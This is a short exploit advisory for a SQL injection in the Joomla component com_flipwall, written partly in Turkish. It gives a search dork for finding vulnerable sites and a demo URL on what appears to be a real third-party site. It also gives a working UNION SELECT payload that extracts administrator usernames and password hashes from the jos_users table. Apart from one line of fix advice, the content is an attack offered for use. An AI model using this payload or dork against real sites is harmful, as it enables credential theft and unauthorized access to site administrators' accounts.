28 lines
No EOL
880 B
Text
28 lines
No EOL
880 B
Text
=========================================================
|
|
Joomla Component com_flipwall SQL Injection Vulnerability
|
|
=========================================================
|
|
|
|
# Author : Fl0riX ~ Bug Researchers
|
|
|
|
# Name : Joomla com_flipwall
|
|
|
|
# Bug Type : SQL injection
|
|
|
|
# Dork: "com_flipwall"
|
|
|
|
# Infection : Admin Login Bilgileri Alinabilir.
|
|
|
|
# Demo Vuln :
|
|
[+]http://0611.info/index.php?option=com_flipwall&controller=flipwall&catid=[EXPLOIT]
|
|
|
|
[+] Vendor:http://www.pulseextensions.com/
|
|
|
|
# Note: AsDemo Sitede Filtre Var Haberiniz olsun :)
|
|
|
|
# Bug Fix Advice : Zararli Karak terler Filtrenmelidir.
|
|
#############################################################
|
|
< ------------------- header data end of ------------------- >
|
|
< -- bug code start -- >
|
|
EXPLOIT :
|
|
null+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users--
|
|
< -- bug code end of -- > |